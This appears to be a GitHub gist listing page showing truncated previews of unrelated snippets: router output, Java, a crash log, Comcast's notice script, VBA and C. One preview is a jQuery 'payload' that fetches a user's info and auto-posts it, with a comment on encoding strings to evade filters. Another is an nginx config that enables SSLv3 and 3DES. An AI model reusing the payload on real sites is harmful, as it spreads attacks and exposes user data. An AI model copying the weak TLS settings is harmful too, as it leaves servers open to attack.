This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
TESTGW01#archive config | |
TESTGW01#sh archive | |
The maximum archive configurations allowed is 10. | |
There are currently 10 archive configurations saved. | |
The next archive file will be named flash:backups-<timestamp>-78 | |
Archive # Name | |
1 flash:backupsFeb--3-11-55-49.089-DST-68 | |
2 flash:backupsFeb--4-11-57-43.957-DST-69 | |
3 flash:backupsFeb--5-11-59-38.981-DST-70 | |
4 flash:backupsFeb--6-12-01-35.430-DST-71 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public static void BinarySearch(String Filename) throws IOException { | |
//int index = -1; | |
int lower = 0; | |
int upper = elementCount -1; //stateCollection.length - 1; | |
int current; | |
boolean found = false; | |
int probe = 0; | |
String searchKey; | |
String c; | |
String p; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ssl on; | |
ssl_certificate /etc/ssl/certs/mycert.pem; | |
ssl_certificate_key /etc/ssl/private/mykey.pem; | |
ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2; | |
ssl_prefer_server_ciphers on; | |
ssl_session_timeout 5m; | |
ssl_session_cache builtin:1000 shared:SSL:10m; | |
ssl_ciphers ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AES:RSA+3DES:!ADH:!AECDH:!MD5:!DSS; | |
add_header Strict-Transport-Security max-age=31536000; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Process: csgo_osx [346] | |
Path: /Users/USER/Library/Application Support/Steam/*/csgo_osx | |
Identifier: csgo_osx | |
Version: ??? | |
Code Type: X86 (Native) | |
Parent Process: bash [343] | |
User ID: 501 | |
Date/Time: 2012-12-16 21:59:24.986 -0600 | |
OS Version: Mac OS X 10.8.2 (12C60) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script language="JavaScript" type="text/javascript"> | |
// Comcast Cable Communications, LLC Proprietary. Copyright 2012. | |
// Intended use is to display browser notifications for critical and time sensitive alerts. | |
var SYS_URL='/e8f6b078-0f35-11de-85c5-efc5ef23aa1f/aupm/notify.do'; | |
// var image_url='http://servicealerts.comcast.net:8080/images/mt'; | |
var image_url='http://xfinity.comcast.net/constantguard/BotAssistance/notice/images'; | |
var headertext1='<strong>Comcast Courtesy Notice</strong>'; | |
var textline1='You have reached 90% of your <b>monthly data usage allowance</b>.'; | |
var textline2='Please sign in for more information and to remove this alert.'; | |
var acknowledgebutton='<a href=\"#\" onClick="document.location.href=\''+SYS_URL+'?dispatch=redirect&redirectName=login¶mName=bmUid\'" title="Sign in to acknowledge" style="color: #FFFFFF;"><img alt="Sign in to acknowledge" src="'+image_url+'/mt_signin.png"/></a>'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//jQuery Payload | |
$.get("user_info", | |
function(data) { | |
$("#content").val(escape(data)); | |
$("form").submit(); | |
} | |
); | |
// Strings changed to String.fromCharCode() to avoid filtering of ' and " in posts. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Do While Not IsEmpty(ActiveCell) | |
ActiveCell.Hyperlinks.Add ActiveCell, ActiveCell.Value | |
ActiveCell.Offset(1, 0).Range("A1").Select | |
Loop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <time.h> | |
#include <netinet/in.h> | |
typedef struct { | |
int ID; | |
char * title; | |
char * link; | |
char * date; | |
int upVotes; | |
int downVotes; |